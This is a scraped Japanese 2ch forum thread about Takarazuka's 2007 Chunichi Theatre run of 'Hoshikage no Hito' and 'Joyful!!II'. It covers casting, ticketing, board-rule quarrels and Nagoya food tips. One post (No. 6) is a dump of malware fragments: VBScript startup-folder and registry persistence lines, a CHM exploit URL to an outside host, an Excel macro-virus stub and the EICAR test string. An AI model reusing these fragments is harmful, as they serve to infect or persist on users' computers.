1read 100read
宝塚 ★中日劇場公演★ (576) TOP カテ一覧 スレ一覧 2ch元 削除依頼
○●明日海の月組語り●○ 第百六十五夜 (135)
セリフ 作品名を翻訳@宝塚版 (382)
♪劇団四季はなぜ名古屋の低級さに気付かない♪ (512)
【宝塚】心の闇スレッド103 (679)
男が性転換すればタカラジェンヌになれるのか? (203)
○●明日海の月組語り●○ 第百六十五夜 (135)

宝塚 ★中日劇場公演★


1 :2006/10/19 〜 最終レス :2013/03/08
2月の名古屋は宝塚歌劇でHOOT!!に。
中日劇場公演について、マタ〜リ語りましょう。

2 :
2007年2月2日(金)〜2月25日(日) 一般前売:2006年12月2日(土)
ミュージカル・ロマン
『星影の人』−沖田総司・まぼろしの青春−
作・演出/柴田侑宏 演出・振付/尾上菊之丞
ダンシング・レビュー
『Joyful!!II』
作・演出/藤井大介

3 :
『星影の人』 〔解 説〕
1976年、汀夏子主演により雪組で上演され、好評を博した日本物の名作の初の再演。
新撰組にまつわる数々のエピソードの中でも、殆ど語り継がれていない沖田総司の恋物語に焦点を当て、
虚実織り交ぜながら、その短くも激動の青春を、爽やかに、そして哀しく謳いあげます。
幕末の動乱期。勤皇佐幕両派が相争っていた頃。
沖田総司は、新撰組副長助勤筆頭、一番隊組長の位置にあった。
文久四年の夏。祇園の一角で、激しい斬り合いの音がする。
沖田が七、八人の浪士を相手にしていたのだ。帰り路を急ぐ沖田に雨が降りかかる。
そこへ傘をさした芸妓玉勇が通りかかる。
「傘をお持ちやすのか」と聞く玉勇にかぶりを振る沖田。
玉勇は、新撰組の沖田という名前を聞いて、何か心に残るものがあった。
壬生の新撰組の屯所に、町人姿に身をやつした山崎丞が、桂小五郎の居所を突き止めたと駆けつけてくる。
さっそく組長の土方歳三や沖田を先頭に、祇園の小料理屋へと向かう。
祇園の街角。虚無僧姿の桂が足に怪我をして逃げてくる。その前に立ち塞がる沖田。
二人は、まだ沖田が江戸にいた頃、ある道場で手合わせをしていた。
沖田は、怪我を負っている桂に敢えて剣を抜かなかった。
桂を見送った沖田は、偶然にも玉勇と再会する。
そのまま別れてしまうに忍びぬ二人は、あくる日の午後、会う約束をついしてしまう。
約束の場所、建仁寺の境内には、すでに一組の男女がしのび逢っていた。
同じ新撰組総長の山南敬助と遊女明里であった。
二人が散策しているところへ沖田がやってくる。
山南は新撰組のあり方に疑問を抱いているのだと、沖田に心中を吐露する。
山南たちが立ち去るのを見届けた玉勇が、沖田に声を掛ける。
「ただ話をしたいと思うただけどしたのに、何やのめりこんでいきそうどす」。
いつしか二人は、淡い恋心を抱いていた。
その翌日、鴨川べりで新撰組が宴を催していた。この宴を狙って、刺客が乗り込んで来た。
迎え討つ沖田は、立ち回りの最中にひどいめまいに襲われる。肺が冒されていたのだ。
沖田は血を吐いて倒れる。 自分の病状を医師に問いただす沖田。
「あと二年の命か…懸命に隊のために働こう。忙しくなるぞ」沖田は自らを奮い立たせる……。

4 :
『Joyful!!II』
〔解 説〕
2003年に宝塚大劇場、東京宝塚劇場で上演されたショー作品のリバイバル。
美しい音楽を奏でてくれる「楽器」にスポットを当て、それぞれの「楽器」から受けるイメージを膨らませた、
華やかでファンタスティックなダンシング・レビュー。

5 :
公式に、ミズ沖田がアップされたお(・∀・)ノ

6 :
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :
ID:RriUlfgGって、例の香ばしいミズファン?
雪スレで嫌味ったらしいレスつけてるよね。

8 :
中日や日生、DCに全ツ等のスレって、スレ立て検討がペンディングになってた筈。
新スレ設置相談室に行かずに、いきなりスレたてちゃったのね。

9 :
勝手にこんなスレ立てるなよ、全く。

10 :
それより誰も>>1
HOOT
を突っ込まないのか?

11 :
hoot
━━ v., n. やじる(声) ((at)) (〜 down やじり倒す; 〜 off [out, away] やじって追出す);
(フクロウが)ホーホーと鳴く(声); (汽笛・らっぱの)鳴る(音) ((at));
つまらぬもの; ((否定文で)) 少しも (do not care a 〜 [two 〜s]);
〔話〕 大笑い(する).

hoot・er
━━ n. 汽笛, サイレン; やじる人; フクロウ; 〔英俗〕 鼻

12 :
公式みてきたけど、ミズ沖田なかなかいいね。
日本物メイクもきれいだった。
更新された解説によると、総司のほかに、新撰組隊士の土方、山南、山崎、
長州の桂、玉勇、明里の名前が出てた。
初演を観てないから、どんな感じになるのか分からないけど
男役の役が多めなのかな?

13 :
すごいな。
水ファン、やりたい放題。

14 :
スレ落ちもないし、とりあえず新スレ相談室に行ったらどうだろう。
たてたもん勝ちで使っちゃうってのは、これだから○ファンは・・・的ネタになるし。
外部劇場公演スレも、以前は某ヲタさんが騒いでたので皆ちょっとひいて
しばらく様子見しましょうみたいな雰囲気が相談室にはあったけれど、
今なら検討話も進むんじゃないだろうか。

15 :
土方は?誰なんだろう。
集合日が、待ち遠しい。

16 :
age

17 :
雪組中日公演Romance de paris/レ・コラージュのDVDってないんですか?

18 :
ないよ。CSでOAされたかなー

19 :
>>17
主演者が同じ場合は再演物はDVD化されないらしいよ。

20 :
>18,>19
そうなんですか。CSとってないから残念です。
教えていただきありがとうございました

21 :
配役発表まだかな〜

22 :
個人的希望&妄想でw
土方    かなめ
桂     ゆみこ
山南   ひろみ
源三郎  組長
近藤   ハマコ



23 :


24 :
このスレをたてた>>1、本日のIDはID:L/mlKhsd

25 :
自分でブログ作ってやれば良いのに。迷惑。

26 :
スレ立てできる人がうらやましい本人ですけど。

27 :
中日劇場スレできたんだ。
昔、新スレ相談室で作るか議論したことあったよね。
名古屋のならではの美味しいものとか土産とか、交通手段とか
地方公演ならではの情報交換に有用だと思う。

28 :
水ファンが勝手にたてて、新スレ相談室で決めてきたらと言われてもシカトしてるんだよ。

29 :
24、25、28
マジレスですが、落としたかったら、
ご自分たちも書き込まないのが一番いいのでは?

30 :
この板じゃ、もうこのスレは落ちないよ。

31 :
皆さん、中日公演の演目は星影だけではないですよ。
ジョイ2のほうはどうなるのかご存知の方いらっしゃいますか?
壮・立樹・音月でやっていた場面は残っているんでしょうかね?
あとコーラス隊は何人なのか?
かなりいろいろ気になってます。

32 :
もうすぐ初日だから

33 :
なにこのスレ

34 :
初日おめでとう
ageます

35 :
名古屋は雪が降らず、晴れです。
気温は低いものの風もなく
良い初日となりました。

36 :
おめでとうございます。
中日劇場限定で、雪組おでんが売られるそうですよ。
○▽□− 



本気にしてくれた?

37 :
立ったものは使うべし

38 :
無駄だとオモ
水ファンはどうか知らないけど、雪って公演中の劇場スレには
書き込まない性質っぽい。
コム時代、東宝スレに書き込まれたレス数なんて数える程だし。

39 :
こういうスレがあるって、知らないだけじゃないの?
私も今日まで気づかなかったよ。

40 :
これ立てたのミズファンなんだけど。

41 :
中日も売れてないけど、エリザツアーも売れてないんだね。
お披露目なのに中部発のツアーが人数集まらず中止!
超恥ずかしい上劇団的には水への印象マイナスポイントだねwww
「劇団から怒られちゃうから買って下さい」って、お茶会でファンに頼めばいいのに。
それかイメガの古嫁に頭下げてなんとかしてもらえば?
その辺上手にやればいいのに。
たかこにしっかり学んだ2代目婿トップだろwww
そんな情けない結果が出てるのに初日挨拶で「今年の雪組はすごいですよ!」だ?
寝言は寝てから言え!!

42 :
ID:dEf7OIsR
今日もあちこちコピペですか。
よほど暇なんだね。

43 :
中日、せまっくるしいし暗い。生徒がジャンプしたら客席が揺れたのは気のせいか?

44 :
せっかくの中日スレだから、名古屋のグルメ処も教えてほしい〜。

45 :
博多座もあるし中日スレがあってもいいんじゃない?
今日(昨日か)はじめていってきました。
劇場自体はちょっと古目だけどこぢんまりしててみやすかった。
ただ、エレベーターがなかなかこなくてすごく困ったです。
あと駅の案内も非常にみにくい。(栄駅に限らず全体的にみずらかった)
時間に余裕をもって行動するのをおすすめします。

46 :
スレがあってもいいかどうか新スレ相談室で決めてきたらと言われてるのに、
勝手にスレたてしたミズファンが知らん顔してるのが無責任だって話。

47 :
リング状のあったかいブリオシュの上にソフトクリームが乗っていて
シロップをかけてるスイーツが食べられるチェーン店の喫茶店て
中日ビルの近くにありますか?

48 :
すごいな。
水ファン、やりたい放題。

49 :
水さんはじめ、新生雪組の中日楽しみです♪
もうごらんになった方たちの、ツボなどもお教えくださいませ。
あと、名古屋の方たちには、グルメ処も教えてほしい!
「もしもあなたが一晩、ご贔屓を連れて名古屋で食事をするならどこですか?」

50 :
中日ビル地下のひつまぶしの店

51 :
たてたもん勝ちミズファン。
板のルールも守れない自己中っぷり。

52 :
>47
コメダですね。検索してみてください。

53 :
>49
ツボは…
百聞は一見にしかず!ですよ。

54 :
スレ使うなら、相談室でちゃんと決めてきたら?
なし崩し的に使っちゃうのはよくないよ。

55 :
>49
終演後、いつも友達と近場の「山ちゃん」にいくけど、
贔屓となら池下の「黒牙」・八事の「ヤゴト千歳」あたりお勧め。
唯、名古屋は夜が早いので(閉店時間)、東新町から高速で30分
程の阿久比の「今人」は如何?予約制で365日24時間OKですよ。
全て箸で頂けるフレンチです。

56 :
55です。
ヤゴト千歳は和食+ワインでした。ハウスワインの白がお勧めです。

57 :
名古屋といえば手羽先!!
やっぱり世界の山ちゃんがいいですよ。
でも、大衆むきだからあんまりおしゃれなかんじはしないですよ。
それか中日劇場の地下のみそにこみの山本屋も有名ですよ。
それか、味噌カツ食べたかったらラシックの上の矢場とんがいいですよ。
おしゃれな居酒屋とかなら、名駅よりも栄のほうがあるからその辺でなんか見つけてください。
なんでこんだけ親切に教えてるんだろう。

58 :
名駅地下のシャポーなんとか?のモーニング

59 :
>>58
シャポーブラン

60 :
シロノワール

61 :
>>57
山本屋本店(中日地下)と山本屋総本家(大須)は、
どちらの味噌煮込みうどんが好みですか?

62 :
49です♪
>53さん そうですよね、おっしゃるとおりです〜。
でも、まだ1週間ちょっと、この悶々とした状況が続くので
とにかく、何でも、情報を伺いたかったんです。。。
そして、55からのみなさん! ご親切にありがとうございます♪
ひつまぶしも、お箸でいただけるフレンチも気になります!
あああ、早くみたいです〜! 

63 :
やりたい放題、自己中ミズファン。
自分達さえよければそれでいいのか。

64 :
>61
山本屋総本家は、栄にもありますよ。中日劇場から歩けたはず。
どちらかはお漬物がおかわりし放題なんですよね。

65 :
>62さん
53です。突き放す感じだったかなー
沖田のはかなげさ、玉勇の艶やかさ、土方の重厚さ、立回り場面が私のつぼ。
ショーはJoyfulの合唱、ベースの場面。次回も楽しみ

66 :
ところで、中日ってサバキあります?
午前中のチケを確保していて、おもしろかったら午後も
観たい、と思ってるんですが…。あ、平日です。

67 :
>66
平日なら、中日劇場のHPを見た限りじゃ、夜の部は結構チケットが残ってるから大丈夫では?
気になるなら、自分で該当日のHPをチェックすれば?

68 :
>65さん♪
62です!
いえいえ…舞台見られるその日まで悶々とするのもシアワセです。
沖田のはかなげさも、玉勇の艶やかさも、土方の重厚さも楽しみ!
ありがとうございました!

69 :
>>67
いや、もう残っている席は端っこしかないから、
ひょっこりサバキでもう少し良い席が出ていたり
しないもんかなぁ、とおもったんですわ。
遠征するのに中日HPも見ないで行くような
無計画者では有りませんw

70 :
>69
中日公演は毎年平日は意外とサバキが少ないよ。
観たい人が観たい分だけチケットを買ってる感じ。
でも中日って端っこの席でも、
大劇場ほど逆側が見えなかったりってことは無いような気が。
まあ、音響は最悪だけどね>端っこ

71 :
14 名前:名無しさん@花束いっぱい。 投稿日:2006/10/24(火) 01:51:31 ID:OjbSgUNE
スレ落ちもないし、とりあえず新スレ相談室に行ったらどうだろう。
たてたもん勝ちで使っちゃうってのは、これだから○ファンは・・・的ネタになるし。
外部劇場公演スレも、以前は某ヲタさんが騒いでたので皆ちょっとひいて
しばらく様子見しましょうみたいな雰囲気が相談室にはあったけれど、
今なら検討話も進むんじゃないだろうか。

72 :
>>70タソ、ありがとうございます。
では、中日劇場へお電話することに致します。
初一人遠征、頑張ってきます!

73 :
名古屋といえばモーニングですが、オススメのモーニングのお店(栄)を教えてほしいです。

74 :
モーニングってねぇ、そんな街中じゃなくって、
市外の喫茶店の方がいろいろついてきていいんだわ。
栄なんてコーヒー高いし、そんなところでモーニング食べないし・・・
普通はモーニングって飲み物注文したら勝手にタダでついてくるもんなんだけど、
栄だと「モーニングセット」ってやつでコーヒー代+αになるよ。

75 :
中日は、何処泊まってるの?
ホテル住まいは、大変だ!

76 :
今日、見てきました。2年振りの中日です。
緞帳を使ってないんですね。最近の中日劇場はそうなの?
床に立ち位置の番号を張ってなかった。そんなことあるのかな、ヅカで。
ただの見落としかしら。
観劇の前後に、蓬莱軒と山本屋本店も寄りました。ウマー

77 :
すみませんが、ひとつ質問させて下さい。
中日劇場さん、たまに通路横に補助席出てることありますよね?
今回も出ていますか?

78 :
客席降りがあるから補助席ないのでは?

79 :
以前のグラフで、水さんがまたがってたラクダは、どこにありますか?

80 :
アラビアンロックかね?
それだったら地下の1番出口を出て、観覧車とオンチッチって言う1階がゲーセンの間の道を真っ直ぐ行くとあるよー!
分かりにくくてすまんぜよ

81 :
矢場とん( ゚Д゚)ウマーです

82 :
スレを使うなら、相談室でちゃんと決めてきたら。
知らぬ存ぜぬの自己中っぷりを晒してるわけだが。

83 :
80
ありがとうございました。

84 :
1階のエレベーターホールで、並んで行ってらっしゃーいって、やってますか?

85 :
やってるよ

86 :
朝日新聞で雪組中日のことが出てたらしいのですが何日のものですか?

87 :
>>84
9:50頃、とな&シナ&かぐや&あんな団体様で楽屋入り
みんなカワユス(*´д`)ハアハア
で、おいらはサンモリッツでモーニング中

88 :
昼の部カーテンコール
水「皆様の暖かい拍手とひつまぶしとみそかつのお陰でパワー全開です」

89 :
>86
木曜朝刊

90 :
中●スポーツは初日だけですか?
劇場じゃもう買えないですよね…orz

91 :
組スレ荒れてるからこっち上げておきます。
公演話をしたい人はこっちへよろしく。

92 :
板内で合意もとれてないのに、勝手に使うなって・・・

93 :
コムガイチ来場記念age

94 :
作ってしまって削除もされてないんだから
有効に使って何が悪い。

95 :
いくらなんでもちょっとそれはヒドくないか。
サーバ資源は効率よく使おうと、板住人で検討して決めてきたローカルルールは
今だって通用してると思うんだが。

96 :
削除されないからよいって…すごい言いぐさですな。
自己中もここまで酷いと、返す言葉が無くなりますw

97 :
>>93
ガイチさんも来たんだ〜

98 :
今日の出の時間わかりますか?

99 :
組スレへどぞー

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
______夢華あみ______ (170)
今後の舞台予定を語るスレ【四季版】 (766)
★何でも好きな役が出来たら何やる?★ (451)
【雑談NG】OGジェンヌの仕事情報のみを書くスレ4 (102)
短歌・俳句 de 宝塚 (223)
最低最悪トップ(主演男役)を決めろ!6 (186)
--log9.info------------------
⊂・^彡ロアッソ熊本255馬力⊂・^ミ (240)
ジェフユナイテッド千葉 ≡JEF UNITED 1389≡ (435)
↑↑↑ サンフレッチェ広島 Part1135 ↑↑↑ (701)
☆☆☆柏レイソルスレッドpart1174☆☆☆ (604)
移籍・レンタル・戦力外「ら」スレpart4719 (1001)
ヴァンフォーレ甲府、遂にJ1優勝!!643 (1001)
【俊輔に】 中村憲剛Part2 【似てる】 (349)
○△△○△●●●△○○○○京都サンガ(760)AA修正 (526)
前園真聖容疑者逮捕 (335)
【初心者】Jリーグ初心者のための質問スレPart65 (641)
十勝フェアスカイ・ジェネシス 五勝目 (179)
☆超!奮迅☆ サガントス 第358幕☆ (787)
グルージャ盛岡 part25 (390)
       ガンバ大阪 Part1802        (1001)
【愛は】カマタマーレ讃岐 41玉目【不滅です】 (117)
なでしこリーグ(Lリーグ)国内女子サッカー part86 (970)
--log55.com------------------
電気保安協会part24
【僻地】水力発電部門の闇 Part1【モテない】
アイテックってどうよ? 15号炉
電力会社を辞めたい人たち(大卒限定)9
【志賀原発】 北陸電力Part2 【ほくリンク】
IDにgasが出るまでブボボ(`;ω;´)モワッするスレ14
【再エネ】再生可能エネルギー【原発】 ◆2
【家財】ヤマトホームコンビニエンス【法人】 Part.2